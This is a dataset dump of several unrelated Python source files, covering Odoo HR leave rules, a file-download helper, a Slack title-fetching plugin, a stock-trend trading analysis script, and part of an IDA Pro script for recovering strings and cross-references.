@api.constrains('holiday_status_id')\n def _check_holiday_custom(self):\n for rec in self:\n # for leaves die only\n if (rec.holiday_status_id.custom_leave == True and rec.holiday_status_id.applicable_for == 'both' and rec.holiday_status_id.only_time_granted == False):\n if rec.employee_id.gender == 'male' or rec.employee_id.gender == 'female':\n if rec.number_of_days > rec.holiday_status_id.fixed_period:\n raise ValidationError(_(\"Duration must be \") + str(rec.holiday_status_id.fixed_period))\n # for wedding and hej\n elif ( rec.holiday_status_id.custom_leave == True and rec.holiday_status_id.applicable_for == 'both' and rec.holiday_status_id.only_time_granted == True ) :\n if rec.employee_id.gender == 'male' or rec.employee_id.gender == 'female':\n if rec.employee_id.employee_time_granted == True:\n raise ValidationError(_(\"This type only time granted \"))\n elif rec.number_of_days > rec.holiday_status_id.fixed_period:\n raise ValidationError(_(\"Duration must be \") + str(rec.holiday_status_id.fixed_period))\n\n # for women only\n elif rec.holiday_status_id.custom_leave == True and rec.holiday_status_id.applicable_for == 'female':\n if rec.employee_id.gender == 'female':\n if rec.number_of_days > rec.holiday_status_id.fixed_period:\n raise ValidationError(_(\"Duration must be \") + str(rec.holiday_status_id.fixed_period))\n elif rec.employee_id.gender != 'female':\n raise ValidationError(_(\"This leave Applicable for only Female\"))\n\n\nclass HrAllocation(models.Model):\n _inherit = 'hr.leave.allocation'\n\n @api.model\n def create_employee_allocation(self):\n Employees = self.env['hr.employee'].search([])\n Timeeofftyp = self.env['hr.leave.type'].search(\n [('allocated_method', '=', 'auto'), ('automated_allocation', '=', 'based')], limit=1)\n today = datetime.datetime.today()\n t_today = today.day\n t_month = today.month\n for employee in Employees:\n if employee.contract_id.state == 'open':\n started_date = datetime.datetime.strptime(\n employee.started_date.strftime('%Y-%m-%d'), '%Y-%m-%d')\n s_today = started_date.day\n s_month = started_date.month\n if t_today == s_today and t_month == s_month:\n allocation_vals = {\n 'name': _('Annual Leave for ') + employee.name,\n 'holiday_status_id': Timeeofftyp.id,\n 'allocation_type': 'regular',\n 'holiday_type': 'employee',\n 'number_of_days': employee.legal_leave_monthly_allocation,\n 'employee_id': employee.id\n }\n self.env['hr.leave.allocation'].create(allocation_vals)\n\n","sub_path":"time_off_custom_leave/models/custom_leave.py","file_name":"custom_leave.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"108696669","text":"import copy\nimport urllib\nfrom math import inf\nfrom urllib.request import urlopen, Request\n\nimport os\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\nfrom src.DownloadStatistics import DownloadStatistics\nfrom src.log import log\n\n\nfriendly_user_agent = \\\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'\n # 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'\n\nKILO = 2**10\nMEGA = 2**20\nSOUP_PARSER_HTML = 'html.parser'\nCONTENT_LENGTH = 'content-length'\n\n\ndef make_safe_url(url):\n return urllib.parse.quote(url, safe='$-_.+!*\\'(),;/?:@=&%')\n\n\ndef fetch_url(url, headers=None, return_bytes=False):\n # log('fetching 
{}'.format(url))\n headers = make_headers_with_user_agent(headers)\n req = Request(url, headers=headers)\n with urlopen(req) as page:\n response = page.read()\n if return_bytes:\n return response\n else:\n return str(response)\n\n\ndef make_headers_with_user_agent(headers):\n if headers is None:\n headers = dict()\n headers['User-Agent'] = friendly_user_agent\n return headers\n\n\ndef get_absolute_url(domain, relative_url):\n return \"{}/{}\".format(domain, relative_url)\n\n\ndef generate_chrome_driver():\n options = webdriver.ChromeOptions()\n # no junk output in console\n options.add_argument('log-level=3')\n\n options.add_argument(\"--mute-audio\")\n options.add_argument(\"--incognito\")\n # options.add_argument(\"--enable-devtools-experiments\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--headless\")\n\n capabilities = webdriver.DesiredCapabilities.CHROME\n # capabilities['javascriptEnabled'] = True\n driver = webdriver.Chrome(chrome_options=options, desired_capabilities=capabilities)\n return driver\n\n\ndef driver_timeout_get_url(driver, url):\n try:\n driver.get(url)\n except TimeoutException:\n pass\n return\n\n\ndef __draw_progressbar(done, total, report_string_format, progress_bar_length=30):\n bar_done = '#' * int(progress_bar_length * done/total)\n bar_left = '-' * int(progress_bar_length * (total - done)/total)\n percentage = done/total\n print('\\r' + report_string_format.format(bar=bar_done + bar_left, percentage=percentage), end='')\n return\n\n\ndef my_reporthook(count, block_size, total, download_statistics):\n download_statistics.report_block_downloaded(block_size)\n\n done_megabytes = count * block_size / MEGA\n speed_megabytes = download_statistics.get_speed() / MEGA\n info_report_string = '\\t{speed:.2f}MBps'\n\n if total is not None:\n size_megabytes = total / MEGA\n estimated = ((size_megabytes - done_megabytes)/speed_megabytes if speed_megabytes != 0 else inf) / 60\n info_report_string += '\\t{done:.2f}/{total_size:.2f} (MB)\\tEst: {estimated:.2f} minutes'\n else:\n size_megabytes = '?'\n estimated = '?'\n info_report_string += '\\t{done:.2f}/{total_size} (MB)\\tEst: {estimated} minutes'\n\n info_report_string = info_report_string.format(speed=speed_megabytes,\n done=done_megabytes,\n total_size=size_megabytes,\n estimated=estimated)\n\n if total is not None:\n __draw_progressbar(count * block_size,\n total,\n '[{bar}]{percentage:.2%}' + info_report_string,\n progress_bar_length=50)\n else:\n print('\\r' + info_report_string, end='')\n return\n\n\ndef download_file(url, file_path, headers=None):\n log('downloading: {} -> {}'.format(url, file_path))\n url = make_safe_url(url)\n headers = make_headers_with_user_agent(headers)\n\n download_statistics = DownloadStatistics()\n response = requests.get(url, stream=True, headers=headers)\n chunk_size = 4096\n if CONTENT_LENGTH in response.headers.keys():\n total_size = int(response.headers[CONTENT_LENGTH])\n else:\n total_size = None\n with open(file_path, 'wb') as outfile:\n for i, data in enumerate(response.iter_content(chunk_size=chunk_size)):\n outfile.write(data)\n my_reporthook(i, chunk_size, total_size, download_statistics)\n\n # urlretrieve(url=url, filename=file_path, reporthook=my_reporthook, data=headers)\n print()\n log('finished downloading {}'.format(file_path))\n return\n\n\ndef download_file_from_multiple_sources(urls, path, headers=None):\n log('downloading {} from multiple urls'.format(path))\n # if not os.path.exists(path):\n # os.makedirs(path)\n\n headers = 
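The chunked download above drives a text progress bar by hand from each chunk callback. A compact, self-contained sketch of the same pattern, simulating the byte stream so it runs without a network (the total and chunk sizes are made up):

```python
import sys
import time

def draw_progress(done, total, width=30):
    # Render a '#'-bar proportional to done/total, redrawn on one line.
    filled = int(width * done / total)
    bar = '#' * filled + '-' * (width - filled)
    sys.stdout.write('\r[{}] {:.1%}'.format(bar, done / total))
    sys.stdout.flush()

total = 1_000_000
done = 0
while done < total:
    done = min(done + 64_000, total)  # pretend a chunk just arrived
    draw_progress(done, total)
    time.sleep(0.01)
print()
```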
make_headers_with_user_agent(headers)\n with open(path, 'wb') as f:\n for i, url in enumerate(urls):\n # file_name = url[url.rfind('/') + 1:]\n # file_path = os.path.join(path, file_name)\n f.write(fetch_url(url, headers=headers, return_bytes=True))\n print('\\r{}/{}...'.format(i, len(urls)), end='')\n print()\n log('finished downloading {}'.format(path))\n return\n","sub_path":"BrowseUtils.py","file_name":"BrowseUtils.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"608305247","text":"\"\"\"http://www.iphones.ru/tracer/... will return meta information about page\"\"\"\nimport re\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport httplib2 \n\ndef get_meta(url):\n http = httplib2.Http()\n headers, body = http.request(url)\n soup = BeautifulSoup(body, 'html.parser')\n meta = (u\"{0}\").format(soup.title.string)\n \n return meta \n\ndef on_message(msg, server):\n text = msg.get(\"text\", \"\")\n match = re.findall(r\"(?:http:\\/\\/(www)?\\.iphones\\.ru\\/tracer\\/)(.+)\", text)\n if not match:\n return\n\n return get_meta(\"http://www.iphones.ru/tracer/\" + match[0])\n\n","sub_path":"limbo/plugins/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"410841459","text":"import logging\nimport os\nimport sys\nimport time\nimport datetime as dt\nimport urllib.request as req\nimport urllib.parse as pars\nimport interface.bot as bot\nimport xml.etree.ElementTree as et\nfrom logging.handlers import TimedRotatingFileHandler\nfrom datetime import datetime, timedelta\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass Operator:\n def __init__(self):\n # variable init\n self.bot_smwj = object()\n self.logger = object()\n self.db_session = object()\n self.logger = object()\n self.bind = str()\n self.today = time.strftime(\"%Y%m%d\")\n\n # sub classes init\n self.logger_start()\n self.chatbot_start()\n self.orm_init()\n\n # business day check\n if len(sys.argv) > 1 and sys.argv[1] == 'server':\n if self.bizday_check():\n # etl run\n if len(sys.argv) > 2 and sys.argv[2] is not None:\n self.etl_run(sys.argv[2])\n else:\n self.etl_run(self.today)\n else:\n self.shut_down()\n\n def chatbot_start(self):\n self.bot_smwj = bot.BotSmwj(self)\n self.bot_smwj.start()\n self.bot_smwj.send_message(\"smwj-fw is starting up\")\n\n def logger_start(self):\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n formatter = logging.Formatter('[%(levelname)s:%(lineno)s] %(asctime)s > %(message)s')\n self.logger = logging.getLogger()\n\n fh = TimedRotatingFileHandler(\"C:\\SMWJ_LOG\\\\analysis\", when=\"midnight\")\n fh.setFormatter(formatter)\n fh.suffix = \"_%Y%m%d.log\"\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setFormatter(formatter)\n\n self.logger.addHandler(fh)\n self.logger.addHandler(ch)\n self.logger.setLevel(logging.INFO)\n\n def orm_init(self):\n scott = ic.dbconfig[\"user\"]\n tiger = ic.dbconfig[\"password\"]\n host = ic.dbconfig[\"host\"]\n self.bind = 'mysql+mysqlconnector://' + scott + ':' + tiger + '@' + host + ':3306/smwj'\n\n engine = create_engine(self.bind)\n dbsession = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n self.db_session = dbsession()\n\n def fw_run(self, edate):\n # 0. 마스터 db 에 데이터 입력 : 향후 개발\n # 1. 
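The tracer plugin above extracts a page title with BeautifulSoup. The same extraction can be exercised offline by parsing a literal HTML string; the markup here is invented for the demo:

```python
from bs4 import BeautifulSoup

html = "<html><head><title>iPhones.ru tracer page</title></head><body></body></html>"
soup = BeautifulSoup(html, 'html.parser')
# soup.title is the <title> tag; .string is its text content.
print(u"{0}".format(soup.title.string))
```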
마스터 db 에서 종가 확인 대상 종목 조회\n # 1) 신규 종목 추가됐을 경우 : 향후 개발\n # 2) 기존 종목 제외됐을 경우 : 향후 개발\n # 2. 종목들의 종가 확인\n # 3. forecast 계산\n # 4. position 계산\n # 5. 2~4 반복\n # 6. 종합 position 계산\n # * 계산한 포지션과 현재 포지션에 차이가 10% 이내일 경우 포지션 변동 없음\n # * 신규 종목 추가,제외시 포지션 리밸런싱 : 향후 개발\n # 7. 결과값 db 저장\n df_forecast = fc.forecast_ewmac()\n eb.login(self.logger)\n eb.retrieve_item_mst(self.logger, self.bind)\n\n #edate = self.today\n row_cnt = \"1\"\n\n d = datetime.today() - timedelta(days=10)\n sdate = d.strftime(\"%Y%m%d\")\n\n eb.retrieve_daily_chart(self.logger, self.bind, self.db_session, edate, edate)\n eb.retrieve_investor_volume(self.logger, self.bind, edate, edate)\n eb.retrieve_market_index_tr_amt(self.logger, self.bind, edate, edate)\n eb.retrieve_abroad_index(self.logger, self.bind, edate, row_cnt)\n eb.retrieve_market_liquidity(self.logger, self.bind, edate, sdate, row_cnt)\n\n self.shut_down()\n\n def bizday_check(self):\n url = 'http://apis.data.go.kr/B090041/openapi/service/SpcdeInfoService/getHoliDeInfo'\n query_params = '?' + pars.urlencode(\n {pars.quote_plus('serviceKey'): ic.publicdata['key'], pars.quote_plus('solYear'): self.today[:4],\n pars.quote_plus('solMonth'): self.today[4:6]})\n\n request = req.Request(url + query_params)\n request.get_method = lambda: 'GET'\n response_body = req.urlopen(request).read()\n\n root = et.fromstring(response_body)\n holidays = list()\n for locdate in root.iter('locdate'):\n holidays.append(locdate.text)\n\n self.logger.info(\"holiday list\")\n self.logger.info(holidays)\n\n bizday = True\n if dt.datetime.today().weekday() >= 5:\n bizday = False\n self.bot_smwj.send_message(\"today is weekend\")\n elif self.today in holidays:\n bizday = False\n self.bot_smwj.send_message(\"today is holiday\")\n elif self.today[4:8] == '0501':\n bizday = False\n self.bot_smwj.send_message(\"today is mayday\")\n\n return bizday\n\n def shut_down(self):\n self.bot_smwj.send_message(\"smwj-fw is shutting down\")\n\n os._exit(0)\n\n\nif __name__ == \"__main__\":\n op = Operator()\n\n import const.stat as ic\n import pandas as pd\n import numpy as np\n # import matplotlib.pyplot as plt\n import analysis.trend.anal_trend_common as com\n import analysis.trend.anal_trend_signal as sig\n import analysis.trend.anal_trend_position as pos\n\n pd.set_option('display.max_columns', None)\n pd.set_option('display.max_rows', None)\n\n '''가격 조회'''\n # prices = com.retrieve_pf_item_price('9', '20180101', '20190101')\n prices = com.retrieve_pf_item_price('10', '20110801', '20161231')\n # prices.groupby('item').describe()\n # prices.head(5)\n\n '''신호 및 변동성 계산'''\n # raw_signal, volatility = sig.signal_ewmac(prices, 16, 64)\n raw_signal_s, volatility_s = sig.signal_ewmac(prices, 4, 16)\n raw_signal_m, volatility_m = sig.signal_ewmac(prices, 16, 64)\n raw_signal_l, volatility_l = sig.signal_ewmac(prices, 64, 256)\n\n raw_signal = raw_signal_s.join(raw_signal_m, how='inner', rsuffix='_m')\n raw_signal = raw_signal.join(raw_signal_l, how='inner', rsuffix='_l')\n # raw_signal.head(5)\n # raw_signal.describe()\n # raw_signal.tail()\n\n test_df = raw_signal_s[['122630']]\n test_df = test_df.join(prices.groupby('item').apply(lambda x: x['close']).T[['122630']], how='inner', rsuffix='_prc')\n\n ax1 = test_df[['122630']].plot()\n\n ax2 = ax1.twinx()\n ax2.spines['right'].set_position(('axes', 1.0))\n test_df[['122630_prc']].plot(ax=ax2, color='Green')\n\n test_df.plot()\n # plt.legend(raw_signal_s.columns)\n # plt.subplot(211)\n # plt.plot(raw_signal_s)\n # plt.subplot(212)\n # 
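`bizday_check` combines a weekend test with a holiday list fetched from the public-data API. The core decision can be sketched without the network call, using a hard-coded holiday set; the dates below are placeholders standing in for the API response:

```python
import datetime as dt

HOLIDAYS = {'20140101', '20140501'}  # placeholder; the real code fetches these

def is_business_day(day):
    if day.weekday() >= 5:                 # 5 = Saturday, 6 = Sunday
        return False
    if day.strftime('%Y%m%d') in HOLIDAYS:
        return False
    return True

print(is_business_day(dt.date(2014, 5, 1)))  # False: holiday (May Day)
print(is_business_day(dt.date(2014, 5, 2)))  # True: an ordinary Friday
```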
plt.plot(prices.pivot(columns='item').pct_change())\n\n '''신호 스케일링'''\n scaled_signal = sig.signal_scaling(raw_signal, 25)\n # scaled_signal.abs().describe()\n # scaled_signal.tail()\n\n '''스케일링한 신호 비교'''\n # test_ewm_fast = raw_signal * 10 / raw_signal.abs().ewm(span=32).mean()\n # test_ewm_fast1 = raw_signal * 10 / raw_signal.abs().ewm(span=32, min_periods=32).mean()\n # test_ewm_slow = raw_signal * 10 / raw_signal.abs().ewm(span=64).mean()\n # test_mean = raw_signal * 10 / raw_signal.abs().rolling(window=64).mean()\n # test_static = raw_signal * 3.75\n\n # test_ewm_fast.abs().describe()\n # test_ewm_fast1.abs().describe()\n # test_ewm_slow.abs().describe()\n # test_mean.abs().describe()\n # test_static.abs().describe()\n\n # scaled_signal\n # plt.subplot(212)\n # plt.plot(scaled_signal)\n\n # scaled_signal.describe()\n # scaled_signal.tail()\n # volatility.describe()\n # volatility.tail()\n\n '''포지션 계산'''\n raw_pos = pos.position_sizing(scaled_signal, volatility, 10000000, 0.25)\n # raw_pos.describe()\n\n '''포지션 조정'''\n adj_pos = pos.position_stabilizing(raw_pos)\n\n # adj_pos.describe()\n # adj_pos.head(20)\n # raw_pos.head(20)\n\n adj_prc = prices.groupby('item').apply(lambda x: x['close']).T\n adj_prc = adj_prc[adj_pos.index[0]:]\n\n '''포지션 금액 확인'''\n returns, corr = com.dynamic_returns(adj_prc, adj_pos)\n\n # corr\n # adj_prc.describe()\n\n # adj_pos.head(20)\n # security_val.head(20)\n # cash_val.head(20)\n # account_val.head(20)\n # returns.head(20)\n # returns.sum()\n # np.mean(np.exp(returns) - 1)\n\n # need 'openpyxl' package\n with pd.ExcelWriter('v2_test_v1.1_20190424.xlsx') as writer:\n adj_prc.to_excel(writer, sheet_name='price')\n adj_pos.to_excel(writer, sheet_name='position')\n returns.to_excel(writer, sheet_name='returns')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"143233000","text":"# Copyright (c) 2017 Trail of Bits, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom flow import *\nfrom table import *\n\n\ndef is_sane_reference_target(ea):\n \"\"\"Returns `True` if `target_ea` looks like the address of some code/data.\"\"\"\n if is_invalid_ea(ea):\n return False\n\n flags = idc.GetFlags(ea)\n if idaapi.isAlign(flags):\n return False\n\n if idc.isHead(flags):\n return True\n\n if has_string_type(ea):\n return True\n\n if idc.isTail(flags):\n head_ea = idc.PrevHead(ea)\n if has_string_type(head_ea):\n return True \n\n # TODO(pag): Check if it points at a logical element in an array, or at a\n # field of a struct.\n\n if idc.isCode(flags):\n return is_block_or_instruction_head(ea)\n\n if is_referenced(ea):\n return True\n\n # NOTE(pag): We test `idc.isCode` above; this check looks to see if the\n # segment itself is a code segment. 
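`sig.signal_ewmac` is not shown, but the calls above suggest a fast/slow EWMA crossover over prices. A self-contained pandas sketch of that rule on a synthetic price series, using the 16/64 spans from the script (the scaling and volatility steps are omitted, and this is an assumed reading of the function, not its actual source):

```python
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
prices = pd.Series(100 + np.cumsum(rng.normal(0, 1, 500)))

def signal_ewmac(prices, fast_span, slow_span):
    # Raw EWMAC signal: fast EWMA of price minus slow EWMA of price.
    fast = prices.ewm(span=fast_span).mean()
    slow = prices.ewm(span=slow_span).mean()
    return fast - slow

raw = signal_ewmac(prices, 16, 64)
print(raw.tail())
```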
This check happens after\n # `is_referenced`, because we may have something like a vtable\n # embedded in a code segment.\n if is_code(ea):\n return False\n\n\n item_size = idc.ItemSize(ea)\n\n DEBUG(\"!!! target_ea = {:x} item_size = {}\".format(ea, item_size))\n return 1 != item_size \n\ndef is_read_only_segment(ea):\n seg_ea = idc.SegStart(ea)\n seg = idaapi.getseg(seg_ea)\n\n if not seg:\n return False\n\n return (seg.perm & idaapi.SEGPERM_WRITE) == 0\n\n_NOT_STRING_TYPE_EAS = set()\n\n# TODO(pag): Why does the following get treated as a string with type `48326`?\n#\n# ; struct _EXCEPTION_POINTERS ExceptionInfo\n# ExceptionInfo _EXCEPTION_POINTERS \ndef has_string_type(ea):\n global _NOT_STRING_TYPE_EAS\n if ea in _NOT_STRING_TYPE_EAS:\n return False\n\n if not is_read_only_segment(ea):\n return False\n\n str_type = idc.GetStringType(ea)\n return (str_type is not None) and str_type != -1\n\ndef next_reasonable_head(ea, max_ea):\n \"\"\"Returns the next 'reasonable' head, skipping over alignments. One heuristic\n for matching strings is to see if there's an unmatched string between two\n matched ones. If the next logical head is a string, but the actual head is\n an alignment, then we really want to find the head of the string.\n\n TODO(pag): Investigate using `idc.NextNotTail(ea)`.\"\"\"\n while ea < max_ea:\n ea = idc.NextHead(ea, max_ea)\n flags = idc.GetFlags(ea)\n if not idaapi.isAlign(flags):\n return ea\n\n return idc.BADADDR\n\ndef find_missing_strings_in_segment(seg_ea, seg_end_ea):\n \"\"\"Try to find and mark missing strings in this segment.\"\"\"\n global _NOT_STRING_TYPE_EAS\n end_ea = idc.SegEnd(seg_ea)\n ea, next_ea = seg_ea, seg_ea\n last_was_string = False\n\n while next_ea < end_ea:\n next_head_ea = next_reasonable_head(next_ea, seg_end_ea)\n ea, next_ea = next_ea, next_head_ea\n item_size = idc.ItemSize(ea)\n if is_jump_table_entry(ea):\n DEBUG(\"Found jump table at {:x}, jumping to {:x}\".format(ea, next_ea))\n continue\n\n next_is_string = has_string_type(next_head_ea)\n\n as_str = idc.GetString(ea, -1, -1)\n if has_string_type(ea):\n if as_str is not None and len(as_str):\n next_ea = ea + item_size\n last_was_string = True\n DEBUG(\"Found string {} of length {} at {:x}, jumping to {:x}\".format(\n repr(as_str), item_size, ea, next_ea))\n make_head(ea)\n continue\n else:\n _NOT_STRING_TYPE_EAS.add(ea)\n\n # If we find a zero, then assume it's possibly padding between strings, and\n # so don't change the state of `last_was_string`.\n if 0 == read_byte(ea):\n next_ea = ea + 1\n continue\n\n if as_str is None or not len(as_str):\n last_was_string = False\n continue\n\n # A bit aggressive, but lets try to make it into a string.\n if last_was_string and 1 < len(as_str):\n old_item_size = idc.ItemSize(ea) \n if 1 != idc.MakeStr(ea, idc.BADADDR):\n last_was_string = False\n continue\n\n item_size = idc.ItemSize(ea)\n next_ea = ea + item_size\n last_was_string = True\n\n if 1 != old_item_size or not is_referenced(ea):\n DEBUG(\"WARNING: Made {:x} into a string of length {}\".format(ea, item_size))\n continue\n\n # Clear the `last_was_string` flag\n last_was_string = False\n\n # # Look for one string squashed between another. 
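The string sweep above leans on IDA's API, so it only runs inside IDA. The underlying idea, walking a byte range and promoting runs of printable bytes to strings, can be sketched in plain Python over a bytes buffer; the 4-byte minimum length is an arbitrary choice for the demo:

```python
def find_ascii_strings(buf, min_len=4):
    # Yield (offset, text) for runs of printable ASCII that end at a NUL
    # or any non-printable byte, mimicking a naive string sweep.
    start = None
    for i, b in enumerate(buf):
        printable = 0x20 <= b < 0x7f
        if printable and start is None:
            start = i
        elif not printable:
            if start is not None and i - start >= min_len:
                yield start, buf[start:i].decode('ascii')
            start = None
    if start is not None and len(buf) - start >= min_len:
        yield start, buf[start:].decode('ascii')

blob = b'\x00\x01hello world\x00\x90\x90/usr/bin\x00ab\x00'
for off, s in find_ascii_strings(blob):
    print(hex(off), s)  # 'ab' is skipped: shorter than min_len
```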
Compilers tend to place\n # # all strings together, and sometimes IDA misses some of the intermediate\n # # ones when they aren't directly referenced.\n # if last_was_string and next_is_string:\n # max_str_len = (next_head_ea - ea)\n # if 1 != idc.MakeStr(ea, idc.BADADDR):\n # last_was_string = False\n # continue\n\n # item_size = idc.ItemSize(ea)\n # DEBUG(\"Inferred string {} of length {} at {:x} to {:x}\".format(\n # repr(as_str), item_size, ea, next_head_ea))\n # make_head(ea)\n # next_ea = ea + item_size\n # last_was_string = True\n\ndef remaining_item_size(ea):\n flags = idc.GetFlags(ea)\n size = idc.ItemSize(ea)\n if idc.isHead(flags):\n return size\n\n head_ea = idc.PrevHead(ea, max(0, ea - size))\n if is_invalid_ea(head_ea):\n return 0\n assert (head_ea + size) >= ea\n return (head_ea + size) - ea\n\ndef find_missing_xrefs_in_segment(seg_ea, seg_end_ea, binary_is_pie):\n \"\"\"Look for cross-refernces that were missed by IDA. This function assumes\n a natural alignments for pointers (i.e. 4- or 8-byte alignment).\"\"\"\n\n seg_ea = (seg_ea + 3) & ~3 # Align to a 4-byte boundary.\n\n try_qwords = get_address_size_in_bits() == 64\n try_dwords = True\n if try_qwords and binary_is_pie:\n try_dwords = False\n\n pointer_size = try_qwords and 8 or 4\n ea, next_ea = idc.BADADDR, seg_ea\n\n missing_refs = []\n\n while next_ea < seg_end_ea:\n ea, next_ea = next_ea, idc.BADADDR\n if is_invalid_ea(ea):\n break\n\n flags = idc.GetFlags(ea)\n\n # Jump over strings.\n if has_string_type(ea):\n item_size = max(1, remaining_item_size(ea)) # Guarantee forward progress.\n next_ea = ea + item_size\n DEBUG(\"Found string at {:x}, jumping to {:x}\".format(ea, next_ea))\n continue\n\n if (ea % 4) != 0:\n next_ea = (ea + 3) & ~3\n DEBUG(\"Aligning from {:x} to {:x}\".format(ea, next_ea))\n assert ea < next_ea\n continue\n\n fixup_ea = idc.GetFixupTgtOff(ea)\n if binary_is_pie and not is_sane_reference_target(fixup_ea):\n continue\n\n qword_data, dword_data = 0, 0\n\n # Try to read it as an 8-byte pointer.\n if try_qwords and (ea + 8) <= seg_end_ea:\n target_ea = qword_data = read_qword(ea)\n if is_sane_reference_target(target_ea):\n DEBUG(\"Adding qword reference from {:x} to {:x}\".format(ea, target_ea))\n make_xref(ea, target_ea, idc.MakeQword, 8)\n next_ea = ea + 8\n continue\n\n # Try to read it as a 4-byte pointer.\n if try_dwords and (ea + 4) <= seg_end_ea:\n target_ea = dword_data = read_dword(ea)\n if is_sane_reference_target(target_ea):\n DEBUG(\"Adding dword reference from {:x} to {:x}\".format(ea, target_ea))\n make_xref(ea, target_ea, idc.MakeDword, 4)\n next_ea = ea + 4\n continue\n\n # We've got a reference from here; it might actually be that we're inside\n # of a larger thing (e.g. an array, or struct) and so this reference target\n # doesn't belong to `ea`, but really a nearby `ea`. 
Let's go and remove it.\n target_ea = get_reference_target(ea)\n if not is_invalid_ea(target_ea) and 0 != (qword_data | dword_data):\n DEBUG(\"WARNING: Removing likely in-object reference from nearby {:x} to {:x}\".format(\n ea, target_ea))\n idaapi.do_unknown_range(ea, 4, idc.DOUNK_EXPAND)\n\n next_ea = ea + 4\n\n DEBUG(\"Stopping scan at {:x}\".format(ea))\n\ndef _next_code_or_jt_ea(ea):\n \"\"\"Scan forward looking for the next non-data effective address.\"\"\"\n seg_end_ea = idc.SegEnd(ea)\n while ea <= seg_end_ea:\n flags = idc.GetFlags(ea)\n if idc.isCode(flags):\n break\n if is_jump_table_entry(ea):\n break\n ea += 1\n return ea\n\ndef find_missing_xrefs_in_code_segment(seg_ea, seg_end_ea, binary_is_pie):\n \"\"\"Looks for data cross-references in a code segment.\"\"\"\n ea, next_ea = seg_ea, seg_ea\n while next_ea < seg_end_ea:\n ea = next_ea\n\n if is_jump_table_entry(ea):\n next_ea = ea + 1\n continue\n\n # This manifests in AArch64 as something like:\n #\n # .text:00400488 LDR X0, =main\n # .text:0040048C LDR X3, =__libc_csu_init\n # .text:00400490 LDR X4, =__libc_csu_fini\n # .text:00400494 BL .__libc_start_main\n # .text:00400498 BL .abort\n # .text:00400498 ; End of function _start\n # .text:00400498\n # .text:00400498 ; ----------------------------------------------------\n # .text:0040049C ALIGN 0x20\n # .text:004004A0 off_4004A0 DCQ main \n # .text:004004A8 off_4004A8 DCQ __libc_csu_init\n # .text:004004B0 off_4004B0 DCQ __libc_csu_fini\n #\n # Where the `LDR` references a nearby slot in the `.text` segment wherein\n # there is a reference to the real function.\n #\n # In x86, we see this behavior with embedded exception tables. This comes\n # up a bunch in Windows binaries.\n flags = idc.GetFlags(ea)\n if idc.isData(flags):\n next_ea = _next_code_or_jt_ea(ea + 1)\n find_missing_xrefs_in_segment(ea, next_ea, binary_is_pie)\n continue\n\n else:\n next_ea = idc.NextHead(ea)\n continue\n\n DEBUG_POP()\n\ndef decode_segment_instructions(seg_ea, binary_is_pie):\n \"\"\"Tries to find all jump tables ahead of time. A side-effect of this is to\n create a decoded instruction and jump table cache. The other side-effect is\n that the decoding of jump tables will *remove* some cross-references.\"\"\"\n seg_end_ea = idc.SegEnd(seg_ea)\n for head_ea in idautils.Heads(seg_ea, seg_end_ea):\n inst, _ = decode_instruction(head_ea)\n get_instruction_references(inst, binary_is_pie)\n table = get_jump_table(inst, binary_is_pie)\n\n for funcea in idautils.Functions(seg_ea, seg_end_ea):\n find_default_block_heads(funcea)\n\ndef process_segments(binary_is_pie):\n \"\"\"Pre-process a segment and try to fill in as many cross-references\n as is possible.\"\"\"\n\n seg_eas = [ea for ea in idautils.Segments() if not is_invalid_ea(ea)]\n\n # Go through through the data segments and look for strings, and through the\n # code segments and look for instructions. 
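`find_missing_xrefs_in_segment` probes each aligned offset as a candidate 4- or 8-byte pointer. Outside IDA, the same probe can be sketched with `struct` over a bytes buffer, treating any value that lands in a chosen address range as a candidate reference; the range bounds and buffer contents below are invented:

```python
import struct

def scan_pointers(buf, lo, hi, word=8):
    # Probe each word-aligned offset; report values inside [lo, hi).
    fmt = '<Q' if word == 8 else '<I'
    for off in range(0, len(buf) - word + 1, word):
        val = struct.unpack_from(fmt, buf, off)[0]
        if lo <= val < hi:
            yield off, val

buf = struct.pack('<QQQ', 0x400000, 0xdeadbeef, 0x401234)
for off, val in scan_pointers(buf, 0x400000, 0x500000):
    print(hex(off), '->', hex(val))  # offsets 0 and 16 qualify
```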
